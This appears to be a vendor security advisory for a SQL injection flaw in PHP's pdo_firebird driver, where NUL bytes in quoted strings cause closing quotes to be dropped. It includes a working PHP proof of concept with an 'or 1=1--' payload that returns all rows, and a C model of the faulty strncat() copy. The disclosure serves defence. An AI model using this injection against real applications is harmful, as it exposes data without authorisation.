SQL injection in pdo_firebird via NUL bytes in quoted strings

Content

Improper handling of NUL bytes during the preparation of Firebird SQL queries leads to sections of the query being dropped. NUL bytes can find their way into queries even under regular circumstances via PDO::quote().

https://github.com/php/php-src/blob/046ffa257581d6f1a709e9fbc4638793c2ac7e22/ext/pdo_firebird/firebird_driver.c#L437-L442

A new query is constructed token-by-token. When a string token (ttString) contains '\0', the string is copied via strncat() rather than memcpy(), so copying stops after the opening ' quote and drops both the \0 and the terminating ' quote. The SQL tokens following the string are therefore embedded into the string, allowing trivial SQL injection if the next string is also attacker-controlled.

<?php
// Connection details are a placeholder; substitute your own Firebird DSN and credentials.
$dbh = new PDO('firebird:dbname=localhost:/path/to/database.fdb', 'USER', 'PASSWORD');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$dbh->exec('CREATE TABLE users (name VARCHAR(255))');
$dbh->exec("INSERT INTO users VALUES ('Foo')");
$dbh->exec("INSERT INTO users VALUES ('Bar')");

// PDO::quote() happily embeds the NUL byte inside the quoted string.
$param = $dbh->quote("\0");
$param2 = $dbh->quote('or 1=1--');

$stmt = $dbh->query("SELECT * FROM users WHERE name = {$param} AND name = {$param2}");

// Before preparation:
// SELECT * FROM users WHERE name = '\0' AND name = 'or 1=1--'

// After preparation (the \0 and the closing quote of the first string are gone):
// SELECT * FROM users WHERE name = ' AND name = 'or 1=1--'

echo json_encode($stmt->fetchAll(PDO::FETCH_ASSOC)) . "\n";
// [{"NAME":"Foo"},{"NAME":"Bar"}]

This incorrect preparation applies to SELECT, INSERT, UPDATE, DELETE, MERGE, WITH and EXECUTE statements.
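The copy defect described above, modelled as an added C example that is not the php-src driver code: token_len and rebuild_query are a constructed, simplified tokenizer (assumed, not taken from firebird_driver.c), and the PoC query is embedded as a byte string with its NUL. The strncat() path reproduces the "after preparation" line; the length-based memcpy() path keeps every byte.

```c
#include <string.h>
/* Constructed model of the token-by-token rebuild (not the driver's tokenizer): splits on
 * spaces, keeps a single-quoted string as one token, works on an explicit byte length. */
static size_t token_len(const char *q, size_t len, size_t pos) {
    size_t i = pos;
    if (q[i] != '\'') {
        while (i < len && q[i] != ' ') i++;
        return i - pos;
    }
    for (i++; i < len; i++) {
        if (q[i] != '\'') continue;
        if (i + 1 < len && q[i + 1] == '\'') { i++; continue; } /* escaped '' */
        return i + 1 - pos;                                      /* closing quote */
    }
    return i - pos;                                              /* unterminated string */
}
/* Rebuild q (len bytes, may contain NUL) into out. buggy=1 copies string tokens with
 * strncat(), which stops at a NUL byte; buggy=0 uses memcpy() over the token length. */
size_t rebuild_query(const char *q, size_t len, char *out, size_t outsz, int buggy) {
    size_t pos = 0, o = 0;
    out[0] = '\0';
    while (pos < len) {
        size_t tl = (q[pos] == ' ') ? 1 : token_len(q, len, pos);
        if (o + tl >= outsz) return 0;              /* would overflow out */
        if (buggy && q[pos] == '\'') {
            strncat(out + o, q + pos, tl);          /* drops the NUL and what follows it */
            o += strlen(out + o);
        } else {
            memcpy(out + o, q + pos, tl);           /* keeps every byte, NUL included */
            o += tl; out[o] = '\0';
        }
        pos += tl;
    }
    return o;
}
/* The PoC query from above as a byte string; the NUL after the first quote is a real byte. */
static const char QUERY[] = "SELECT * FROM users WHERE name = '\0' AND name = 'or 1=1--'";
#define QUERY_LEN (sizeof(QUERY) - 1)
/* 1 if the strncat() rebuild produces exactly the "after preparation" line shown above. */
int buggy_rebuild_matches_advisory(void) {
    char out[256];
    rebuild_query(QUERY, QUERY_LEN, out, sizeof out, 1);
    return strcmp(out, "SELECT * FROM users WHERE name = ' AND name = 'or 1=1--'") == 0;
}
/* 1 if the memcpy() rebuild reproduces the input byte for byte, so nothing is dropped. */
int fixed_rebuild_preserves_bytes(void) {
    char out[256];
    size_t n = rebuild_query(QUERY, QUERY_LEN, out, sizeof out, 0);
    return n == QUERY_LEN && memcmp(out, QUERY, QUERY_LEN) == 0;
}
```

The input is 58 bytes and the buggy rebuild is 56: exactly the NUL and the closing quote of the first string are lost, which is why the second quoted value ends up outside any string.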

Credits

Aleksey Solovev, Nikita Sveshnikov (Positive Technologies)

Linked CVEs

CVE-ID | Severity (CVE.org) | CVSS (CVE.org) | EPSS | EPSS-% | Published (CVE.org)
CVE-2025-14179 | - | - | - | -

Source details

Identifier | Name | Category | Tags | Audience | Language | Feed URL
PHP Security (php/php-src GHSA) | php_sec | vendor_advisory | php, runtime | - | de | https://github.com/php/php-src/security/advisories